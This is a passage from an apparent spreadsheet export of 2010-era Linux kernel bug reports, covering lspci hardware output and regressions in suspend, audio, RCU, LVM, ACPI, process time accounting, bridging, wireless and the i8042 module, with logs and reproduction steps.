Intel Corporation 6300ESB I/O Advanced Programmable Interrupt Controller [8086:25ac] (rev 02) (prog-if 20 [IO(X)-APIC]) Subsystem: IBM Device [1014:02dd] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: &lt;access denied&gt; 00:1e.0 PCI bridge [0604]: Intel Corporation 82801 PCI Bridge [8086:244e] (rev 0a) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 I/O behind bridge: 00003000-00003fff Memory behind bridge: f8000000-f8ffffff Prefetchable memory behind bridge: f0000000-f7ffffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity+ SERR+ NoISA- VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Kernel modules: shpchp 00:1f.0 ISA bridge [0601]: Intel Corporation 6300ESB LPC Interface Controller [8086:25a1] (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Kernel modules: intel-rng, iTCO_wdt 00:1f.1 IDE interface [0101]: Intel Corporation 6300ESB PATA Storage Controller [8086:25a2] (rev 02) (prog-if 8a [Master SecP PriP]) Subsystem: IBM Device [1014:02dd] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx+ Latency: 0 Interrupt: pin A routed to IRQ 14 Region 0: I/O ports at 01f0 [size=8] Region 1: I/O ports at 03f4 [size=1] Region 2: I/O ports at 0170 [size=8] Region 3: I/O ports at 0374 [size=1] Region 4: I/O ports at 1000 [size=16] Region 5: Memory at c0200000 (32-bit, non-prefetchable) [size=1K] Kernel modules: ata_piix, piix 00:1f.3 SMBus [0c05]: Intel Corporation 6300ESB SMBus Controller [8086:25a4] (rev 02) Subsystem: IBM Device [1014:02dd] Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin B routed to IRQ 17 Region 4: I/O ports at 0440 [size=32] Kernel driver in use: i801_smbus Kernel modules: i2c-i801 01:01.0 VGA compatible controller [0300]: ATI Technologies Inc Radeon RV100 QY [Radeon 7000/VE] [1002:5159] (prog-if 00 [VGA controller]) Subsystem: IBM eServer xSeries server mainboard [1014:02c8] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (2000ns min), Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 10 Region 0: Memory at f0000000 (32-bit, prefetchable) [size=128M] Region 1: I/O ports at 3000 [size=256] Region 2: Memory at f8000000 (32-bit, non-prefetchable) [size=64K] [virtual] Expansion ROM at f8020000 [disabled] [size=128K] Capabilities: &lt;access denied&gt; Kernel modules: radeonfb 02:01.0 SCSI storage controller [0100]: LSI Logic / Symbios Logic 53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI [1000:0030] (rev 08) Subsystem: IBM Device [1014:026d] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 72 (4250ns min, 4500ns max), Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 24 Region 0: I/O ports at 4000 [size=256] Region 1: Memory at deff0000 (64-bit, non-prefetchable) [size=64K] Region 3: Memory at defe0000 (64-bit, non-prefetchable) [size=64K] [virtual] Expansion ROM at c0100000 [disabled] [size=1M] Capabilities: &lt;access denied&gt; Kernel driver in use: mptspi Kernel modules: mptspi 04:00.0 PCI bridge [0604]: Intel Corporation 6700PXH PCI Express-to-PCI Bridge A [8086:0329] (rev 09) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=04, secondary=06, subordinate=06, sec-latency=64 I/O behind bridge: 00005000-0000ffff Memory behind bridge: d9000000-daffffff Prefetchable memory behind bridge: 00000000c0000000-00000000c00fffff Secondary status: 66MHz+ FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity+ SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: &lt;access denied&gt; Kernel modules: shpchp 04:00.2 PCI bridge [0604]: Intel Corporation 6700PXH PCI Express-to-PCI Bridge B [8086:032a] (rev 09) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=04, secondary=05, subordinate=05, sec-latency=64 Memory behind bridge: db000000-dcffffff Secondary status: 66MHz+ FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR- BridgeCtl: Parity+ SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: &lt;access denied&gt; Kernel modules: shpchp 05:01.0 Ethernet controller [0200]: Broadcom Corporation NetXtreme BCM5704S Gigabit Ethernet [14e4:16a8] (rev 10) Subsystem: IBM Device [1014:02e8] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (16000ns min), Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 77 Region 0: Memory at dcff0000 (64-bit, non-prefetchable) [size=64K] Expansion ROM at &lt;ignored&gt; [disabled] Capabilities: &lt;access denied&gt; Kernel driver in use: tg3 Kernel modules: tg3 05:01.1 Ethernet controller [0200]: Broadcom Corporation NetXtreme BCM5704S Gigabit Ethernet [14e4:16a8] (rev 10) Subsystem: IBM Device [1014:02e8] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (16000ns min), Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 78 Region 0: Memory at dcfe0000 (64-bit, non-prefetchable) [size=64K] Expansion ROM at &lt;ignored&gt; [disabled] Capabilities: &lt;access denied&gt; Kernel driver in use: tg3 Kernel modules: tg3 06:01.0 Fibre Channel [0c04]: QLogic Corp. ISP2422-based 4Gb Fibre Channel to PCI-X HBA [1077:2422] (rev 02) Subsystem: QLogic Corp. Device [1077:0136] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 128 (16000ns min), Cache Line Size: 128 bytes Interrupt: pin A routed to IRQ 97 Region 0: I/O ports at 5000 [size=256] Region 1: Memory at dafff000 (64-bit, non-prefetchable) [size=4K] [virtual] Expansion ROM at c0000000 [disabled] [size=256K] Capabilities: &lt;access denied&gt; Kernel driver in use: qla2xxx Kernel modules: qla2xxx 06:01.1 Fibre Channel [0c04]: QLogic Corp. ISP2422-based 4Gb Fibre Channel to PCI-X HBA [1077:2422] (rev 02) Subsystem: QLogic Corp. Device [1077:0136] Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr+ Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 128 (16000ns min), Cache Line Size: 128 bytes Interrupt: pin B routed to IRQ 98 Region 0: I/O ports at 5100 [size=256] Region 1: Memory at daffe000 (64-bit, non-prefetchable) [size=4K] [virtual] Expansion ROM at c0040000 [disabled] [size=256K] Capabilities: &lt;access denied&gt; Kernel driver in use: qla2xxx Kernel modules: qla2xxx</t>
  </si>
  <si>
    <t>unexpected high load since 2.6.35</t>
  </si>
  <si>
    <t>2010-08-05 17:55 UTC</t>
  </si>
  <si>
    <t>2011-03-30 23:45 UTC</t>
  </si>
  <si>
    <t>Subject : unexpected high load since 2.6.35 Submitter : "MadLoisae@gmx.net" &lt;MadLoisae@gmx.net&gt; Date : 2010-08-02 20:53 Message-ID : 4C573041.1070103@gmx.net References : http://marc.info/?l=linux-kernel&amp;m=128078243726655&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>random suspend (S3) problems on Intel DG45ID board</t>
  </si>
  <si>
    <t>2010-08-07 08:55 UTC</t>
  </si>
  <si>
    <t>2010-09-20 17:01 UTC</t>
  </si>
  <si>
    <t>Created attachment 27369 [details] dmesg 2.6.35-04792-ga649fd2 I have problems to use suspend on my Intel DG45ID board. It seems to initiate suspend mode but will freeze on some stage, so it will stay with black screen and blinking cursor on left top corner. I can't access the machine over ssh, and keyboard leds are not blinking. So there is no typical oops sings. I can't make a bisection because it fail randomly. I didn't found good 100% reproduction case. Some times it will fail at first time some times only after reboot. To reproduce is use: echo mem &gt; /sys/power/state even with latest kernel, first suspend was good and second suspend failed. I get this two warning, may be it some how connected: [ 0.000000] ACPI Warning: 32/64 FACS address mismatch in FADT - two FACS tables! (20100428/tbfadt-369) [ 0.000000] ACPI Warning: 32/64X FACS address mismatch in FADT - 0xCBE61F40/0x00000000CBE67E40, using 32 (20100428/tbfadt-486) Any tips are welcome.</t>
  </si>
  <si>
    <t>audio stop playing after while</t>
  </si>
  <si>
    <t>2.6.35 - 2.6.36-rc0</t>
  </si>
  <si>
    <t>2010-08-07 11:00 UTC</t>
  </si>
  <si>
    <t>2010-09-09 05:04 UTC</t>
  </si>
  <si>
    <t>laptop Toshiba A210-15j, after random long while (from minutes to hours) mplayer freezing in play_audio. No longer sound play. After use -ao null, it play everything fine. It's not mplayer problem, other sound are disabled to. Audio mixers are ok. I'm not sure, when were problem introduced, guess .34 or .35 (I using git version, so not sure when it appeared first time) [ 1.761938] ALSA device list: [ 1.761941] #0: HDA ATI SB at 0xf8600000 irq 16</t>
  </si>
  <si>
    <t>TREE_RCU hangs at boot</t>
  </si>
  <si>
    <t>2010-08-07 12:18 UTC</t>
  </si>
  <si>
    <t>2010-09-21 19:08 UTC</t>
  </si>
  <si>
    <t>Paul E. McKenney</t>
  </si>
  <si>
    <t>I upgraded my C3600 from 2.6.34.1 to 2.6.35 and now it hangs on boot. If I switch to TINY_RCU it works again.</t>
  </si>
  <si>
    <t>lvm hangs when creating snapshots of the root partition with 2.6.35</t>
  </si>
  <si>
    <t>2010-08-07 14:36 UTC</t>
  </si>
  <si>
    <t>2011-02-24 15:25 UTC</t>
  </si>
  <si>
    <t>Hello, When I run lvcreate -L1G -n backup -s /dev/gentoo/root to create a snapshot of my root partition, the process hangs. I can only stop my computer with SysRq keys. When I restart the computer, the volume seems to have been created but it is not listed as a snapshot. I have tried LVM 2.02.70 and 2.02.72 and the problem occur with these 2 versions. I am using udev 160. Does anybody know what's happening ? With kernel 2.6.34.2, everything works correctly. Thanks in advance for your help.</t>
  </si>
  <si>
    <t>2.6.35 regression: apci_ns_lookup+0x125/0x57e NULL pointer after ACPI Error: Could not map memory at 0x000000007D422720 - Samsung NP-X120-XA02 laptop</t>
  </si>
  <si>
    <t>2010-08-09 12:33 UTC</t>
  </si>
  <si>
    <t>Roman</t>
  </si>
  <si>
    <t>2011-05-30 08:05 UTC</t>
  </si>
  <si>
    <t>16096 34892</t>
  </si>
  <si>
    <t>Created attachment 27390 [details] kernel config for 2.6.35 After updating from 2.6.34 to 2.6.35, my laptop fails to boot with this message: ACPI: BIOS _OSI(Linux) query ignored ACPI: APIC 7dbfee08 0005a (v01 PTLD ? APIC 06040000 LTP 00000000) ACPI Error: found unknown opcode 0xE0 at AML address f8032e2e offset 0x2, ignoring (20100428/psloop-141) &lt;snip, a lot of errors about unknown opcode&gt; ACPI: Dynamic OEM Table Load: ACPI: APIC (null) 0005A (v01 PTLD ? APIC 06040000 LTP 00000000) ACPI: Interpreter enabled ACPI: Supports S0 S3 S4 S5 BUG: Unable to handle kernel NULL pointer dereference at 0x00000005 IP: [&lt;c125b489&gt;] apci_ns_lookup+0x125/0x57e BIOS update didn't help. Booting with acpi=off solves the issue. Using git-bisect I've found a commit that causes this panic: https://patchwork.kernel.org/patch/106696/ which was a fix for https://bugzilla.kernel.org/show_bug.cgi?id=16357 Reverting this commit solves the issue.</t>
  </si>
  <si>
    <t>/proc/&lt;pid&gt;/stat incorrect user and kernel time accounting</t>
  </si>
  <si>
    <t>2.6.33, 2.6.34, 2.6.35</t>
  </si>
  <si>
    <t>2010-08-10 23:56 UTC</t>
  </si>
  <si>
    <t>Ciriaco Garcia de Celis</t>
  </si>
  <si>
    <t>2012-09-05 06:42 UTC</t>
  </si>
  <si>
    <t>Created attachment 27401 [details] ver_linux output from one affected system In a program intensive in user time CPU, the 'utime' field in /proc/&lt;pid&gt;/stat becomes freezed at some point (utime will never be incremented again) and the 'stime' starts to (wrongly) receive the increments instead. At the same time /proc/stat correctly assings the CPU spent as user mode time (in fact, commands like "top" still show proper global CPU reports). But this problem causes getrusage() to return incorrect values, reporting user mode time as kernel time for the running process (for example, the GNU gmp library benchmark reports wrong timings). Affected kernel versions: 2.6.33, 2.6.34, 2.6.35 Last kernel version not affected by this bug: 2.6.32 Machines known to reproduce the bug: Core 2 Duo E8500, Atom N270, Pentium D. Steps to reproduce the problem: 1) Make a tiny C program doing an infinite loop and run it 2) Examine /proc/PID/stat: - After 2-4 minutes, the User CPU time becomes stalled (in a value from about 15000 to 25000) and will never increase again. - At the same time, the Kernel CPU time incorrectly begins to increase, reporting 100% of the CPU ticks. - However /proc/stat correctly continues reporting the CPU being spent as User time. In example bellow, the user time becomes freezed at "21533" after just 215.33 seconds: ciri@quark:/proc/12096$ cat stat | awk '{ print $14 " " $15 }' ; head -1 ../stat | awk '{ print $2 " " $4 }' ; date 20549 21 116668 6587 Mon Aug 9 23:53:53 CEST 2010 ciri@quark:/proc/12096$ cat stat | awk '{ print $14 " " $15 }' ; head -1 ../stat | awk '{ print $2 " " $4 }' ; date 21533 21 117656 6588 Mon Aug 9 23:54:03 CEST 2010 ciri@quark:/proc/12096$ cat stat | awk '{ print $14 " " $15 }' ; head -1 ../stat | awk '{ print $2 " " $4 }' ; date 21533 639 118275 6589 Mon Aug 9 23:54:09 CEST 2010 ciri@quark:/proc/12096$ cat stat | awk '{ print $14 " " $15 }' ; head -1 ../stat | awk '{ print $2 " " $4 }' ; date 21533 1795 119434 6590 Mon Aug 9 23:54:20 CEST 2010 ciri@quark:/proc/12096$ cat stat | awk '{ print $14 " " $15 }' ; head -1 ../stat | awk '{ print $2 " " $4 }' ; date 21533 16337 134138 6670 Mon Aug 9 23:56:46 CEST 2010</t>
  </si>
  <si>
    <t>random panics in bridging on 2.6.34+</t>
  </si>
  <si>
    <t>2.6.34,2.6.35{,.1,.2-rc1}</t>
  </si>
  <si>
    <t>2010-08-12 16:54 UTC</t>
  </si>
  <si>
    <t>2011-03-31 14:45 UTC</t>
  </si>
  <si>
    <t>Created attachment 27417 [details] screenshot of panic message This did not occur with 2.6.33, the machine is uselessly unstable with 2.6.35. It only appears to happen when there are KVM VM's running. I have not found a reliable way to trigger the panics. The VM's all use bridging, and from the panic message the problem appears to be in bridging. I haven't tested with 2.6.34 yet. Will attach screenshot of panic and .config, please let me know if any more information is needed.</t>
  </si>
  <si>
    <t>2.6.34.4 compilation failed</t>
  </si>
  <si>
    <t>2.6.34.4</t>
  </si>
  <si>
    <t>2010-08-15 10:53 UTC</t>
  </si>
  <si>
    <t>Viktor</t>
  </si>
  <si>
    <t>2012-05-12 16:15 UTC</t>
  </si>
  <si>
    <t>When I start compile kernel on Fedora 13 i386 (use how-to http://fedoraproject.org/wiki/Docs/CustomKernel) I have following error messages: CC arch/x86/kernel/cpu/vmware.o arch/x86/kernel/cpu/vmware.c: In function 'vmware_get_tsc_khz': arch/x86/kernel/cpu/vmware.c:66: error: 'preset_lpj' undeclared (first use in this function) arch/x86/kernel/cpu/vmware.c:66: error: (Each undeclared identifier is reported only once arch/x86/kernel/cpu/vmware.c:66: error: for each function it appears in.) arch/x86/kernel/cpu/vmware.c:68: error: 'HZ' undeclared (first use in this function) make[3]: *** [arch/x86/kernel/cpu/vmware.o] Error 1 make[2]: *** [arch/x86/kernel/cpu] Error 2 make[1]: *** [arch/x86/kernel] Error 2 make: *** [arch/x86] Error 2 Before making new custom kernel all Fedora patches was excludes. Kernel config see attach (config-2.6.34.4).</t>
  </si>
  <si>
    <t>ACPI brightness control misses _BQC function</t>
  </si>
  <si>
    <t>2010-08-15 20:59 UTC</t>
  </si>
  <si>
    <t>2010-10-02 02:17 UTC</t>
  </si>
  <si>
    <t>This message is displayed 2 times in the dmesg output : [ 1.039683] ACPI: Using IOAPIC for interrupt routing [ 1.040313] [Firmware Bug]: ACPI: ACPI brightness control misses _BQC function ... [ 5.214540] dcdbas dcdbas: Dell Systems Management Base Driver (version 5.6.0-3.2) [ 5.221713] [Firmware Bug]: ACPI: ACPI brightness control misses _BQC function I have dell Studio XPS 1645 and a Debian sid OS. I can control the brightness level with the key shortcuts so I suspect it concerns the brightness sensor which is not enabled.</t>
  </si>
  <si>
    <t>rt2800pci driver working on Ralink rt2860 throws Michael MIC failure when connecting to a wpa2-tkip wireless network.</t>
  </si>
  <si>
    <t>2.6.33.4</t>
  </si>
  <si>
    <t>2010-08-16 19:37 UTC</t>
  </si>
  <si>
    <t>elena27183</t>
  </si>
  <si>
    <t>2011-02-17 18:18 UTC</t>
  </si>
  <si>
    <t>Created attachment 27473 [details] Exit of the command wpa_supplicant -dd Overview: Driver compiled from compat-wireless-2010-08-11 in Slackware 13.1 on a machine with a Ralink rt2860 Wext detects a 'MLME-MICHAELMICFAILURE.indication(keyid=0 unicast addr=00:13:d3:6e:22:3c)' when connecting to a WPA2-TKIP wireless net. The result is that the computer doesn't connect to the router. Steps to reproduce: 1) Compile driver rt2800pci on a machine with a Ralink rt2860 and charge module 2) Execute: wpa_supplicant -Dwext -iwlan0 -c(path to wpa_supplicant.conf) Workaround: Change encryption to WPA2-AES in the wireless router. Fragment of wpa_supplicant -dd (Attached complete log): Wireless event: cmd=0x8c02 len=81 WEXT: Custom wireless event: 'MLME-MICHAELMICFAILURE.indication(keyid=0 unicast addr=00:13:d3:6e:22:3c)' Michael MIC failure detected WPA: Sending EAPOL-Key Request (error=1 pairwise=1 ptk_set=1 len=99) WPA: TX EAPOL-Key - hexdump(len=99): 01 03 00 5f 02 0d 09 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 31 60 b9 63 ff b4 38 a0 e1 10 f3 39 5e 86 ed 00 00 RTM_NEWLINK: operstate=1 ifi_flags=0x11043 ([UP][RUNNING][LOWER_UP]) RTM_NEWLINK, IFLA_IFNAME: Interface 'wlan0' added</t>
  </si>
  <si>
    <t>i8042 kernel module failed to load after unloading</t>
  </si>
  <si>
    <t>2.6.35.2  2.6.36-rc1</t>
  </si>
  <si>
    <t>2010-08-17 17:01 UTC</t>
  </si>
  <si>
    <t>Seryodkin Victor</t>
  </si>
  <si>
    <t>2010-09-12 19:01 UTC</t>
  </si>
  <si>
    <t>[1.] One line summary of the problem: i8042 kernel module failed to load after unloading [2.] Full description of the problem/report: i8042 is compiled as dynamic module for the purpose of deactivation keyboard controller handling by i8042 and using alternative specialized kernel module instead The scenario works fine on 2.6.30 kernel (steps 3-7 could be repeated many times after boot) 1) i8042 is loaded at boot stage 2) boot procedure completes 3) i8042 is unloaded before starting usermode program /sys/devices/platform/i8042 directory disappeares 4) specialized kernel module is loaded to service usermode program 5) usermode program does its chores and exits 6) specialized kernel module is unloaded 7) i8042 is loaded to return system to the usual way of life /sys/devices/platform/i8042 directory appeares again After upgrade to 2.6.35.2 (also tested on 2.6.36-rc1) things went wrong: 1) i8042 is loaded at boot stage 2) boot procedure completes 3) i8042 is unloaded before starting usermode program rmmod psmouse rmmod atkbd rmmod libps2 rmmod i8042 !!! At this point /sys/devices/platform/i8042 directory DOES NOT disappeare Skipping steps 4,5,6 for the clarity of the experiment 7) trying to load i8042 again modprobe i8042 i8042 loading FAILES with the following error: Aug 17 20:05:42 localhost kernel: ------------[ cut here ]------------ Aug 17 20:05:42 localhost kernel: WARNING: at fs/sysfs/dir.c:451 sysfs_add_one+0x5f/0x70() Aug 17 20:05:42 localhost kernel: Hardware name: VT8601 Aug 17 20:05:42 localhost kernel: sysfs: cannot create duplicate filename '/devices/platform/i8042' See full kernel error report below [3.] Keywords (i.e., modules, networking, kernel): modules i8042 sysfs [4.] Kernel version (from /proc/version): Linux version 2.6.35.2 (root@localhost.localdomain) (gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) ) #1 SMP PREEMPT Mon Aug 16 16:29:03 MSD 2010 [5.] Output of Oops.. message (if applicable) with symbolic information resolved (see Documentation/oops-tracing.txt) /var/log/messages ------------------------ Aug 17 20:05:42 localhost kernel: PNP: PS/2 Controller [PNP0303] at 0x60,0x64 irq 1 Aug 17 20:05:42 localhost kernel: PNP: PS/2 appears to have AUX port disabled, if this is incorrect please boot with i8042.nopnp Aug 17 20:05:42 localhost kernel: ------------[ cut here ]------------ Aug 17 20:05:42 localhost kernel: WARNING: at fs/sysfs/dir.c:451 sysfs_add_one+0x5f/0x70() Aug 17 20:05:42 localhost kernel: Hardware name: VT8601 Aug 17 20:05:42 localhost kernel: sysfs: cannot create duplicate filename '/devices/platform/i8042' Aug 17 20:05:42 localhost kernel: Modules linked in: i8042(+) iptable_filter ip_tables 8139too pata_via libata [last unloaded: i8042] Aug 17 20:05:42 localhost kernel: Pid: 2025, comm: modprobe Not tainted 2.6.35.2 #1 Aug 17 20:05:42 localhost kernel: Call Trace: Aug 17 20:05:42 localhost kernel: [&lt;c01272e2&gt;] ? warn_slowpath_common+0x68/0x93 Aug 17 20:05:42 localhost kernel: [&lt;c0127372&gt;] ? warn_slowpath_fmt+0x28/0x2c Aug 17 20:05:42 localhost kernel: [&lt;c01bac09&gt;] ? sysfs_add_one+0x5f/0x70 Aug 17 20:05:42 localhost kernel: [&lt;c01bb35a&gt;] ? create_dir+0x53/0x83 Aug 17 20:05:42 localhost kernel: [&lt;c01bb400&gt;] ? sysfs_create_dir+0x76/0x8d Aug 17 20:05:42 localhost kernel: [&lt;c02322b4&gt;] ? kobject_add_internal+0xb5/0x14e Aug 17 20:05:42 localhost kernel: [&lt;c023246c&gt;] ? kobject_add+0x44/0x47 Aug 17 20:05:42 localhost kernel: [&lt;c02b1491&gt;] ? device_add+0x8e/0x45a Aug 17 20:05:42 localhost kernel: [&lt;c02323c2&gt;] ? kobject_set_name_vargs+0x45/0x4c Aug 17 20:05:42 localhost kernel: [&lt;c02b4002&gt;] ? platform_device_add+0xdf/0x11d Aug 17 20:05:42 localhost kernel: [&lt;c02b41a2&gt;] ? platform_create_bundle+0x65/0x93 Aug 17 20:05:42 localhost kernel: [&lt;c816050f&gt;] ? i8042_probe+0x0/0x58b [i8042] Aug 17 20:05:42 localhost kernel: [&lt;c8160067&gt;] ? i8042_init+0x0/0x332 [i8042] Aug 17 20:05:42 localhost kernel: [&lt;c8160366&gt;] ? i8042_init+0x2ff/0x332 [i8042] Aug 17 20:05:42 localhost kernel: [&lt;c010112d&gt;] ? do_one_initcall+0x44/0x120 Aug 17 20:05:42 localhost kernel: [&lt;c014828a&gt;] ? sys_init_module+0x77/0x193 Aug 17 20:05:42 localhost kernel: [&lt;c041c635&gt;] ? syscall_call+0x7/0xb Aug 17 20:05:42 localhost kernel: ---[ end trace 8636451dbd740ccc ]--- Aug 17 20:05:42 localhost kernel: kobject_add_internal failed for i8042 with -EEXIST, don't try to register things with the same name in the same directory. Aug 17 20:05:42 localhost kernel: Pid: 2025, comm: modprobe Tainted: G W 2.6.35.2 #1 Aug 17 20:05:42 localhost kernel: Call Trace: Aug 17 20:05:42 localhost kernel: [&lt;c023233d&gt;] ? kobject_add_internal+0x13e/0x14e Aug 17 20:05:42 localhost kernel: [&lt;c023246c&gt;] ? kobject_add+0x44/0x47 Aug 17 20:05:42 localhost kernel: [&lt;c02b1491&gt;] ? device_add+0x8e/0x45a Aug 17 20:05:42 localhost kernel: [&lt;c02323c2&gt;] ? kobject_set_name_vargs+0x45/0x4c Aug 17 20:05:42 localhost kernel: [&lt;c02b4002&gt;] ? platform_device_add+0xdf/0x11d Aug 17 20:05:42 localhost kernel: [&lt;c02b41a2&gt;] ? platform_create_bundle+0x65/0x93 Aug 17 20:05:42 localhost kernel: [&lt;c816050f&gt;] ? i8042_probe+0x0/0x58b [i8042] Aug 17 20:05:42 localhost kernel: [&lt;c8160067&gt;] ? i8042_init+0x0/0x332 [i8042] Aug 17 20:05:43 localhost kernel: [&lt;c8160366&gt;] ? i8042_init+0x2ff/0x332 [i8042] Aug 17 20:05:43 localhost kernel: [&lt;c010112d&gt;] ? do_one_initcall+0x44/0x120 Aug 17 20:05:43 localhost kernel: [&lt;c014828a&gt;] ? sys_init_module+0x77/0x193 Aug 17 20:05:43 localhost kernel: [&lt;c041c635&gt;] ? syscall_call+0x7/0xb ------------------------ [6.] A small shell script or example program which triggers the problem (if possible) ---------------- #!/bin/sh rmmod psmouse rmmod atkbd rmmod libps2 rmmod i8042 echo "Here comes the trouble (press any key)" read modprobe i8042 ---------------- [7.] Environment [7.1.] Software (add the output of the ver_linux script here) Linux localhost 2.6.35.2 #1 SMP PREEMPT Mon Aug 16 16:29:03 MSD 2010 i686 i686 i386 GNU/Linux Gnu C ./ver_linux: binutils 2.13.90.0.18 util-linux 2.11y mount support module-init-tools 3.6 e2fsprogs 1.41.4 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.2.7 Net-tools 1.60 Kbd 1.15 Sh-utils 4.5.3 Modules Loaded iptable_filter ip_tables 8139too pata_via libata [7.2.] Processor information (from /proc/cpuinfo): rocessor : 0 vendor_id : CentaurHauls cpu family : 6 model : 7 model name : VIA Samuel 2 stepping : 3 cpu MHz : 532.615 cache size : 64 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu de tsc msr cx8 mtrr pge mmx 3dnow up bogomips : 1065.23 clflush size : 32 cache_alignment : 32 address sizes : 32 bits physical, 32 bits virtual power management: [7.3.] Module information (from /proc/modules): psmouse 23896 0 - Live 0xc813e000 iptable_filter 1002 0 - Live 0xc812a000 ip_tables 8403 1 iptable_filter, Live 0xc811e000 8139too 16612 0 - Live 0xc8107000 pata_via 6440 3 - Live 0xc80af000 libata 127723 1 pata_via, Live 0xc8080000 atkbd 13678 0 - Live 0xc8033000 libps2 3684 2 psmouse,atkbd, Live 0xc8024000 i8042 12611 1 libps2, Live 0xc800f000 Kernel configuration (see attachment): kernel-config-2.6.30 kernel-config-2.6.35.2 kernel-config-2.6.36-rc1 